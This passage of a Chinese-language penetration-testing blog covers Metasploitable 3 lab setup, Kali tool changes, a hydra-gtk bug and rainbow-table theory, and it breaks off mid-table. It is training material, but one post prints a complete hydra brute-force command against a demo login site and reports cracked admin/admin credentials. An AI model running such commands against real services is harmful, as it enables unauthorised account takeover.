六、啟動powershell,然後執行:</div>
<div style="background-color: #000066; color: yellow; line-height: 140%; padding: 4px;">
<br />
d: <span style="color: lime;"> #筆者在 D: 槽操作,也可選擇其他有足夠空間(65GB)的磁碟</span><br />
<pre><code>vagrant plugin install vagrant-reload <span style="color: lime;">#安裝vagrant的插件</span></code></pre>
<pre><code>mkdir metasploitable3-workspace <span style="color: lime;">#建立工作目錄</span>
cd metasploitable3-workspace <span style="color: lime;">#切換到工作錄中</span>
</code></pre>
<br />
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile" -OutFile "Vagrantfile" <span style="color: lime;">#下載所需的組態檔</span></div>
<div style="margin-left: 2em; margin-top: 1em; text-indent: -2em;">
七、接在步驟六之後,執行下列指令即可建立metasploitable 3虛擬機。</div>
<div style="background-color: #000066; color: yellow; line-height: 140%; padding: 4px;">
vagrant up ub1404 <span style="color: lime;">##建立ubuntu版的metasploitable 3</span><br />
<span style="color: lime;">## 或者</span><br />
vagrant up win2k8 <span style="color: lime;">##建立win2008版的metasploitable 3</span></div>
執行vagrant up win2k8或<b>vagrant up ub1404</b>之後是漫長的等待,請保持耐心!<br />
<div style="background-color: #993333; border: #aa0000 1px solid; color: yellow; font-size: 11pt; line-height: 120%; padding: 4px;">
<b>註:</b><br />
vagrant up ub1404 會從網路下載ubunt所需的.iso檔,大概要花2至3小時<br />
vagrant up win2k8 會從網路下載win2k8所需的.iso檔,依照下載速度,大概要花5至6小時<br />
(實際時間視網路狀況而定,筆者在建立 win2k8時,曾因網路不穩而中斷)</div>
最後看到<br />
<div style="background-color: #000066; color: white; line-height: 140%; padding: 4px;">
ub1404: This is not an error message; everything may continue to work properly, in which case you may ignore this message.<br />
==< ub1404: Setting hostname...<br />
==< ub1404: Configuring and enabling network interfaces...
</div>
即表示ubuntu版的metasploitable 3建置完成,此時會看到VirtualBox被自動啟動「Metasploitable3-ub1404」虛擬機。<br />
若執<b> vagrant up win2k8</b>,看到下列訊息,即表示Win2K8的Metasploitable 3建置完成:<br />
<div style="background-color: #000066; color: white; line-height: 140%; padding: 4px;">
==> win2k8: Running provisioner: shell...<br />
win2k8: Running: inline PowerShell script<br />
win2k8: CMDKEY: Credential added successfully.<br />
win2k8: System error 67 has occurred.<br />
win2k8: The network name cannot be found.<br />
==> win2k8: Running provisioner: shell...<br />
win2k8: Running: inline PowerShell script<br />
PS D:\metasploitable3-workspace></div>
<div style="margin-top: 1em;">
上述兩部VirtualBox虛擬機,若想移植到VMWare上,可由VirtualBox的「<span style="color: #990000;"><b>檔案-> 匯出應用裝置</b></span>」,匯出成「<span style="color: #cc0000;"><b>*.ova</b></span>」,再由VMWare匯入即可產生VMWare虛擬機!</div>
<div style="margin-top: 1em;">
不論 ubuntu或Win2K8,登入帳密皆為 <span style="color: blue; font-size: 1.5em;"><b>vagrant</b></span>/<span style="color: #990000; font-size: 1.5em;"><b>vagrant</b></span>。</div>
<div style="background-color: #993333; border: #aa0000 1px solid; color: yellow; font-size: 11pt; line-height: 160%; padding: 4px 4px 4px 2em; text-indent: -2em;margin-top:1em;">
註:若不打算自己動手做,筆者在 <b><a href="https://drive.google.com/open?id=1UgI6RR2YOIV1NvqDsAxYz19-DpQOPaJi"><span style="color: yellow;">https://drive.google.com/open?id=1UgI6RR2YOIV1NvqDsAxYz19-DpQOPaJi</span></a></b> 提供 Ubuntu的metasploitable 3的OVA檔。<br />
至於<span style="color: white;"><b>Win2K8</b></span>的<span style="color: white;"><b>metasploitable 3</b></span>因涉及作業系統版權問題,不方便提供! </div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-37100905342645564052019-12-15T20:48:00.001+08:002020-02-15T16:26:23.423+08:00新作「Kali Linux滲透測試工具 第3版」已於2019/12/25上市<div style="border: #ff3399 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1J6UrwFmyDpxQjBTRijskXR5ueqIdrwSC6cAiFrqR5wY7cyOBEkiTWxy7Tlyc06aSbVyk6oeAlFjSz2ajnXWwEM8hy7shSa6nX7RHnkrPeaRVrHCK0gkh0NA8wgdHOjapZM9DFObeo8B/s1600/ACN035700.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1J6UrwFmyDpxQjBTRijskXR5ueqIdrwSC6cAiFrqR5wY7cyOBEkiTWxy7Tlyc06aSbVyk6oeAlFjSz2ajnXWwEM8hy7shSa6nX7RHnkrPeaRVrHCK0gkh0NA8wgdHOjapZM9DFObeo8B/s320/ACN035700.jpg" width="236" /></a></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
筆者在2015年11月配合Kali由1.x改版為2.0,也改寫「Kali Linux滲透測試工具 第2版」,承蒙各位同好不棄。歷經過4年後,Kali依然維持第2版,但收錄的工具卻改變不少,因此,在2019年5月依據Kali 2019.2版,再次改寫本書內容,在進行初稿校正時,Kali又發布2019.3版,所以本書的內容是融合Kali 2019.2及2019.3。
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
本次改版內容包括:<b>強化暴力破解技法</b>、<b>修正部分工具在Kali環境無法運行的問題</b>(包括:ghost phisher、theharvester、huntersearch、clusterd、beef)、<b>改寫metasploit 5用法</b>、<b>增加藍牙滲透測試專章</b>、<b>更多的Wifi工具</b>及<b>一套IPv6工具組</b>,當然也<span style="color: #274e13;">取消部分罕用的內容</span>。不可諱言,前一版的內容也有一大部分被保留下來,畢竟部分工具雖然改版,但用法並未改變。
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
另一項改版重點是:<b>Kismet</b>及<b>recon-ng</b>,這兩套工具的前、後版本,在操作上有很大差異,本書同時介紹這兩套工具前、後版本的差異及使用說明。</div>
本書在下列書局有售:<br />
<a href="http://www.gotop.com.tw/waweb2004/main/WebTL.aspx?ISBN=9789865023584" style="padding-left: 4em;" target="_blank">天瓏圖書</a><br />
<a href="https://www.books.com.tw/products/0010843942" style="padding-left: 4em;" target="_blank">博客來</a><br />
<a href="https://www.kingstone.com.tw/basic/2014713591791?zone=book&lid=book_class1_newbook1_nnnn" style="padding-left: 4em;" target="_blank">金石堂</a><br />
<a href="http://www.eslite.com/product.aspx?pgid=1001113692815503&kw=%e9%99%b3%e6%98%8e%e7%85%a7&pi=0" style="padding-left: 4em;" target="_blank">誠品</a><br />
<br />
<div style="border: #00cc00 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
<span style="color: #b45f06;"><u>「Kali Linux滲透測試工具」並非入門書</u></span>,打算進入滲透測試領域的新手,建議先從筆者另一本著作「<span style="color: #990000;"><b>網站滲透測試實務入門 第二版</b></span>」切入,這是一本以Web為滲透對象的入門書籍。
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4yZEtMCuhCAnXx3wpYUCmQ4QXDRb7vJXd5x7kJm5uNDO4Cy5pOJ1h0lXGdB6KsC41nfGeaQs7nWbpTpVonq12uyCb_Nv_Y5QuNzO4d62XcMC_WFGOykBXTkNAEYPClRhpCkzBTxjxT4AT/s1600/ACN034900.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4yZEtMCuhCAnXx3wpYUCmQ4QXDRb7vJXd5x7kJm5uNDO4Cy5pOJ1h0lXGdB6KsC41nfGeaQs7nWbpTpVonq12uyCb_Nv_Y5QuNzO4d62XcMC_WFGOykBXTkNAEYPClRhpCkzBTxjxT4AT/s320/ACN034900.jpg" width="236" /></a></div>
</div>
<br />
<div style="border: #0066cc 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
如果對nmap有興趣,想要更深入應用nmap掃描技巧及NSE腳本功能,可以參考「<span style="color: #990000;"><b>資安專家的nmap與NSE網路診斷與掃描技巧大公開</b></span>」這本nmap應用專書。<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheAviSvvH-ujFQVfXvH2LmhCuvi4-Nd8kQYmRMOKByuuAIg12tXR1PAm6olW2MNfit-zJdw_q0n6XTLQ04MVAMSFhqqPfTmZqE2ijglYWK78jx8Z7zN3xnBBA17KY9314BBtQIc9CG9_k/s1600/%25E6%259B%25B8%25E5%25B0%2581%25E9%259D%25A2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="650" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgheAviSvvH-ujFQVfXvH2LmhCuvi4-Nd8kQYmRMOKByuuAIg12tXR1PAm6olW2MNfit-zJdw_q0n6XTLQ04MVAMSFhqqPfTmZqE2ijglYWK78jx8Z7zN3xnBBA17KY9314BBtQIc9CG9_k/s320/%25E6%259B%25B8%25E5%25B0%2581%25E9%259D%25A2.jpg" width="236" /></a></div>
</div>
<br />
<div style="border: #ff9900 2px solid; margin: 3px; text-indent: 2em; text-indent: 2em;">
若讀者利用Metasploitable做為自我練習環境,也可以參考「<span style="color: #990000;"><b>Metasploitable|白帽駭客新兵訓練營(電子書)</b></span>」,裡面介紹諸多Metasploitable 2裡的漏洞之攻擊方式。<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3OvXbqeAnXbZQHDwQyCD79r7n10DhMXSehrq6Y2nrQTDBJBkh68-fohbEQzgM8u0WrWk4GSJbCeHQGW8pfvk-BFjQJgMbXg5q_NGJCo-0OnhUAZ6HYrb6uFUvYWd59IJoKipPqYOtMsHL/s1600/Metasploitable%25E7%2599%25BD%25E5%25B8%25BD%25E9%25A7%25AD%25E5%25AE%25A2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="564" data-original-width="398" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3OvXbqeAnXbZQHDwQyCD79r7n10DhMXSehrq6Y2nrQTDBJBkh68-fohbEQzgM8u0WrWk4GSJbCeHQGW8pfvk-BFjQJgMbXg5q_NGJCo-0OnhUAZ6HYrb6uFUvYWd59IJoKipPqYOtMsHL/s320/Metasploitable%25E7%2599%25BD%25E5%25B8%25BD%25E9%25A7%25AD%25E5%25AE%25A2.png" width="225" /></a></div>
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2tag:blogger.com,1999:blog-1967825056283652287.post-79898596889850512742019-09-29T18:55:00.004+08:002019-09-29T18:55:51.160+08:00Kali 2019.3 又害我踩雷<div style="border: #000000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px;">
Kali最近更新成2019.3版,稍為試用了一下,它和2019.2版又有些不一樣,目前發現三處差異,相信還會有更多地雷等著:
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
(一)原來置於/usr/share/windows-binaries/的資源,現在改到/usr/share/windows-resources/binaries/。
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
(二)recon-ng由4.9.x升級為5.0.x,4.x版會連功能模組一併安裝,現在卻必須由使用者透過新的marketplace指令自行安裝,而且指令用法也有不少改變,例如之前載入模組是用「load 模組名稱」,現在改成「modules load 模組名稱」,必須要一段調試時間才能適應新的操作模式。
</div>
<div style="margin-bottom: 8px; margin-left: 3em; text-indent: -2em;">
(三)原本的dnsmap-bulk.sh,現在更名為dnsmap.bulk(不用再加.sh),難怪一直找不到指令。
</div>
<div style="margin-bottom: 8px;">
雖然這些改變造成不便,但沒辦法,要用人家的工具,就只能順著人家的規則走!害我剛完稿的「Kali Linux滲透測試工具 第三版」又要改寫,恐怕影響出版時間。<span style="font-size: large;"><span style="color: #cc0000;"><b>囧</b></span></span></div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-70228383465376056232019-07-27T20:26:00.000+08:002019-07-28T16:46:44.277+08:00許多滲透測試工具在2019年版的Kali上無法正常執行<span style="font-size: large;">Kali推出2019.2版,原本好事一椿,結果改版改過頭了,裡頭有幾套重要工具,不是功能殘缺,就是執行時期發生錯誤,更嚴重的是告訴你執行完成,但什麼結果也沒有,為了撰寫「Kali Linux滲透測試工具 第三版」,幾乎變成在Debug。 </span><br />
<br />
<span style="font-size: large;">幾組無法正常使用的工具有: </span><br />
<ul>
<li><span style="font-size: large;">theHarvester </span></li>
<li><span style="font-size: large;">clusterd </span></li>
<li><span style="font-size: large;">Ghost Phisher </span></li>
<li><span style="font-size: large;">armitage </span></li>
<li><span style="font-size: large;">Beef 與 msfconsole的整合也失效 </span></li>
</ul>
<span style="font-size: large;">衷心期待作者能夠盡快修正版本! </span><br />
<br />
<br />
<span style="font-size: large;">(這篇文章未使用彩色文字及邊框,代表對Kali 2019.2版的哀悼之意) </span>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com4tag:blogger.com,1999:blog-1967825056283652287.post-39137809608226371602019-06-30T09:02:00.001+08:002019-06-30T09:02:55.727+08:00hydry與hydra-gtk的詭異現象<div style="border: #ff0000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px; text-indent: 2em;">
<span style="color: #990000;">今天(2019/06/30)在實驗時發現<b> hydra-gtk</b> 和 <b>hydry</b> 的執行結果竟然不一致。</span><br />
<a name='more'></a></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
操作<b>hydra-gtk</b>的選項,在最底下狀態列會顯示對應的hydra命令,在hydra-gtk啟動暴力破解,卻找不到符合的帳密,如圖一所示。</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQpWwJ3xKsRHAjl9y8EvYcvPUS-p_VfgDL6u-F5ldD6j9F25vo3EOLKxUP2KblrfG-da44nlPjXYktHYGBSLWXAt8xgnEK8nYo7G4lmne9bppWC9WMC-pk4ItT7kuXJxpZZfO76zn8rLpl/s1600/xhydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="1195" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQpWwJ3xKsRHAjl9y8EvYcvPUS-p_VfgDL6u-F5ldD6j9F25vo3EOLKxUP2KblrfG-da44nlPjXYktHYGBSLWXAt8xgnEK8nYo7G4lmne9bppWC9WMC-pk4ItT7kuXJxpZZfO76zn8rLpl/s400/xhydra.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖一:hydra-gtk找不到匹配的密碼</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="border: 1px green dotted; margin: 4px; padding: 4px;">
<span style="color: red;"><b>hydra-gtk轉出的指令:</b></span>
<br />
<div style="margin-left: 1.5em;">
hydra -V -l admin -P /root/password.lst -t 8 -q -m /doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp" demo.testfire.net http-post-form</div>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
但我很清楚有一組<span style="color: #990000;"><b>admin</b></span> / <span style="color: blue;"><b>admin</b></span>的帳密是可以用的,心中疑惑是不是在填<b>hydra-gtk</b>選項時弄錯了什麼,一再檢視都找不到哪裡有錯,於是將<b>hydra-gtk</b>產生的指令在終端上直接執行,結果如圖二所示,真的有找到<span style="color: #990000;"><b>admin</b></span> / <span style="color: blue;"><b>admin</b></span>這組帳密,很明顯<b>hydra-gtk</b>有Bug存在。
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2BipADD-q7XBwJPsD6JRnFKW48Yawdz9EeGX8Y6j2iaWNR7pz4YCWRQlPRnVTmccujSn997FWN-MUjq2KOBFZWEOuIS1JBqN0c_fY6JCBKdyhJENv5-dSJc8qcG_H1L9OyRRpfhRGADKf/s1600/Console-hydra.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="523" data-original-width="1011" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2BipADD-q7XBwJPsD6JRnFKW48Yawdz9EeGX8Y6j2iaWNR7pz4YCWRQlPRnVTmccujSn997FWN-MUjq2KOBFZWEOuIS1JBqN0c_fY6JCBKdyhJENv5-dSJc8qcG_H1L9OyRRpfhRGADKf/s320/Console-hydra.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">圖二:直接在終端機執行就沒有問題</td></tr>
</tbody></table>
<div style="margin-bottom: 8px;">
<span style="color: #cc0000;"><b>外一章</b></span>:當啟用<b>hydra-gtk</b>的<b>debug</b>選項,執行暴力破解時,<b>start</b>頁籤會輸出大量資訊,<b>hydra-gtk</b>不會自動捲動訊息框。此時若手動捲動訊息框,<b>hydra-gtk</b>會當機。
</div>
<hr />
<span style="color: red;"><span style="font-size: large;"><b>結論:</b></span></span><br />
<div style="margin-bottom: 8px; text-indent: 2em;">
<b>hydra-gtk</b>和<b>hydra</b>的整合可能有問題,還是將<b>hydra-gtk</b>當成命令產生器就好,以免造成誤判!
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-35514331791441687882018-11-17T20:30:00.001+08:002019-04-18T14:28:27.966+08:00因為無知,所以出糗--淺談彩虹表原理<a name='more'></a>
<div style="border: #ff0000 4px outset; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin-bottom: 8px; margin-left: 5em; text-indent: -5em;">
<span style="color: red;"><b>鄭重聲明</b></span>:本篇只是淺談<span style="color: #cc0000;"><b>彩虹表</b></span>的基礎原理,同時也釐清筆者多年的錯誤觀念,不涉及彩虹實作細節。 </div>
<div style="background-color: #ffffcc; border: 3px groove #0033cc; margin: 8px; padding: 4px;">
彩虹表就是一個龐大的、針對各種可能的字母組合預先計算好的哈希值的集合,不一定是針對MD5演算法的,各種演算法的都有,有了它可以快速的破解各類密碼。越是複雜的密碼,需要的彩虹表就越大,現在主流的彩虹表都是100G以上。</div>
<div style="margin-bottom: 8px; margin-top: -8px;">
(摘自<a href="http://www.twword.com/wiki/%E5%BD%A9%E8%99%B9%E8%A1%A8" target="_blank">TWWORD的「彩虹表」</a>詞條)</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
上面這段話一直是我所認為的彩虹表。幾年前,老師上課也是這樣教的,在當初對一名初踏入滲透測試領域的新人,雖然很懷疑這種的說法<span style="font-size: small;"><sup><span style="color: #cc0000;">(註)</span></sup></span>,但因基礎不扎實,也將就延用到現在。只因最近讀了一本外文書,才驚覺書中敘述和我的印象有出入。</div>
<div style="margin-bottom: 8px; margin-left: 2em; text-indent: -2em;">
<span style="color: #cc0000;"><b>註:</b></span>若按照上面的說法,一套8字元長的大小寫英數字混合密碼,做出一套彩虹表至少要5000TB的儲存空間,以每顆3TB的硬碟估算,大約是1400顆,這是我當初心中的疑惑!?</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
原來彩虹表不是赤裸裸的將明文密碼與雜湊值照單全收,而是以time-memory trade off(以時間換空間)的策略,<span style="color: #cc0000;"><b>只儲存計算結果的串鏈</b></span>(姑且稱它為彩虹鏈)<span style="color: #cc0000;"><b>的頭尾</b></span>,至於中間的值則在破解時再重新計算。</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
彩虹鏈只存頭尾,那要如何維持完整的彩虹鏈的關係?這涉及兩個函式:雜湊值的計算函式(<b>雜湊函式</b>)及雜函值反轉函式(<b>歸約函式</b> [reduction function])</div>
<div style="margin-bottom: 8px; margin-top: -16px;">
<ul>
<li><span style="color: #cc0000;"><b>雜湊函式</b></span>將明文密碼轉換成雜湊值,用<span style="color: #38761d;"><b><span style="color: #009933;"> H( ) </span></b></span>代替。</li>
<li><span style="color: #cc0000;"><b>歸約函式</b></span>將雜湊值對應到某個明文密碼,用<span style="color: #009933;"><b> R( )</b></span> 代替。</li>
</ul>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
歸約函式並不是解出雜湊值的原始明文密碼,只是儘量不重複地從可能的明文密碼中,找出一筆資料來和雜湊值對應。舉個例子,假設明文密碼只有1字元長,可能值為大寫字母 A到Z (即26種組合),這些密碼的雜湊值就有:</div>
<div style="margin-bottom: 12px; margin-left: 12em; text-indent: -8em;">
<b>Ha</b> = H(A) , <b>Hb</b> = H(B), ... ..., <b>Hz</b> = H(Z) <span style="color: lime;"># Ha 即明文密碼A經過雜湊後的結果。</span></div>
<div style="margin-bottom: 8px;">
歸約函式就是從給定的雜湊值,找出一個對應的明文密碼,若R(Ha) 可以得 M,就將它記成 <b>Rm</b> = R(Ha),依此,假設上述所有雜湊值運算後得到如下結果:</div>
<table border="1" cellpadding="0" cellspacing="0" style="margin-top: -8px; width: 100%;">
<tbody>
<tr>
<td style="widty: 25%;"><b>Rm</b> = R(Ha)=M</td><td style="widty: 25%;"><b>Rl</b> = R(Hb)=L</td><td style="widty: 25%;"><b>Rg</b> = R(Hc)=G</td><td><b>Ro</b> = R(Hd)=O</td>
</tr>
<tr>
<td><b>Rp</b> = R(He)=<b><span style="color: red;">Q</span></b></td><td><b>Rc</b> = R(Hf)=C</td><td><b>Rr</b> = R(Hg)=R</td><td><b>Rd</b> = R(Hh)=<b><span style="color: red;">D</span></b></td>
</tr>
<tr>
<td><b>Rn</b> = R(Hi)=N</td><td><b>Rx</b> = R(Hj)=X</td><td><b>Re</b> = R(Hk)=E</td><td><b>Rs</b> = R(Hl)=S</td>
</tr>
<tr>
<td><b>Rf</b> = R(Hm)=F</td><td><b>Rj</b> = R(Hn)=J</td><td><b>Rk</b> = R(Ho)=K</td><td><b>Ru</b> = R(Hp)=U</td>
</tr>
<tr>
<td><b>Rv</b> = R(Hq)=V</td><td><b>Ri</b> = R(Hr)=I</td><td><b>Rq</b> = R(Hs)=<b><span style="color: red;">Q</span></b></td><td><b>Rb</b> = R(Ht)=B</td>
</tr>
<tr>
<td><b>Rh</b> = R(Hu)=H</td><td><b>Rw</b> = R(Hv)=W</td><td><b>Rt</b> = R(Hw)=T</td><td><b>Ra</b> = R(Hx)=A</td>
</tr>
<tr>
<td><b>Rp</b> = R(Hy)=P</td><td><b>Rd</b> = R(Hz)=<b><span style="color: red;">D</span></b></td><td> </td><td> </td>
</tr>
</tbody>
</table>
<div style="margin-bottom: 8px; margin-top: 8px; text-indent: 2em;">
雜湊函式有<b>碰撞</b>(<span class="st">collision</span>)問題,歸約函式依然有撞問題,由上面的對照表可見 <b>Hh</b>和<b>Hz</b>在通過歸約時都會對應到<b>D</b>;同樣的,<b>He</b>和<b>Hs</b>則對應到<b>Q</b>,因為碰撞問題,也看到雜湊值歸約的結果並沒有<b>Y</b>和<b>Z</b>,以這個範例來說,當拿到Y或Z的雜湊值,而利用此例的彩虹表將會解不出來。</div>
<div style="margin-bottom: 8px;">
</div>
<div>
好了,解釋了<b>雜湊函式</b>與<b>歸約函式</b>之後,來看如何產生彩虹鏈表。</div>
<div style="margin-top: -16px;">
<ol>
<li>從明文密碼中隨機選擇一項(假設為 <b>M</b>),由<span style="color: #38761d;">雜湊函式</span>計算其雜湊值得到<b>Hm</b></li>
<li>將<b>Hm</b>送給<span style="color: blue;">歸約函式</span>計算,反轉得到 <b>F</b>。</li>
<li>再將<b>F</b>交給<span style="color: #38761d;">雜湊函式</span>,又得一組雜湊值<b>Hf</b>。</li>
<li>再將<b>Hf</b>送給<span style="color: blue;">歸約函式</span>計算,反轉得到 <b>C</b>。</li>
</ol>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
一直循環下去就可以得到一條彩虹鏈,但這<b>一條鏈到底要多長</b>呢? 鏈的長短會影響彩虹表的大小及破解時所耗的時間:<b>鏈愈長,愈節省空間,但破解時會增加重算的次數,所以破解速度較慢</b>,下面用<b>短鏈</b>(三階)和<b>長鏈</b>(七階)來解釋。</div>
<div>
若以三階製作彩虹鏈,可能得到的結果:</div>
<table border="0" cellpadding="0" cellspacing="0" style="border: 2px blue solid; line-height: 90%; margin-left: 1em; padding: 4px; width: 70%;">
<tbody>
<tr style="height: 50px;">
<td style="width: 29pt;"><span style="font-size: large;"><b><span style="color: red;">M</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hm</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 22pt;" width="30">F</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 25pt;" width="33">Hf</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 29pt;" width="39">C</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 31pt;" width="42">Hc</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 48pt;" width="64"><span style="font-size: large;"><b><span style="color: red;">G</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">I</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hi</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>N</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hn</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>J</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hj</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">X</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">Q</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hq</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>V</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hv</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>W</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hw</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">T</span></b></span></td>
</tr>
<tr style="height: 50px;">
<td><span style="font-size: large;"><b><span style="color: red;">D</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hd</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>O</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ho</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>K</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">E</span></b></span></td>
</tr>
</tbody>
</table>
<div style="margin: -8px 4px 8px 12px;">
<span style="color: #741b47;"><b>~~底下還有,省略~~</b></span></div>
<div style="margin-top: 8px;">
若以七階製作彩虹鏈,可能得到的結果:</div>
<div>
</div>
<table border="0" cellpadding="0" cellspacing="0" style="border: 2px blue solid; line-height: 90%; margin-left: 1em; padding: 4px; width: 100%;">
<tbody>
<tr style="height: 50px;">
<td style="width: 22pt;"><span style="font-size: large;"><b><span style="color: red;">M</span></b></span></td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hm</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 22pt;" width="30">F</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 25pt;" width="33">Hf</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 17pt;" width="23">C</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 21pt;" width="28">Hc</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 19pt;" width="26">G</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hg</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 16pt;" width="22">R</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 22pt;" width="30">Hr</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 18pt;" width="24">I</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 20pt;" width="27">Hi</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td style="width: 17pt;" width="22">N</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td style="width: 23pt;" width="31">Hn</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
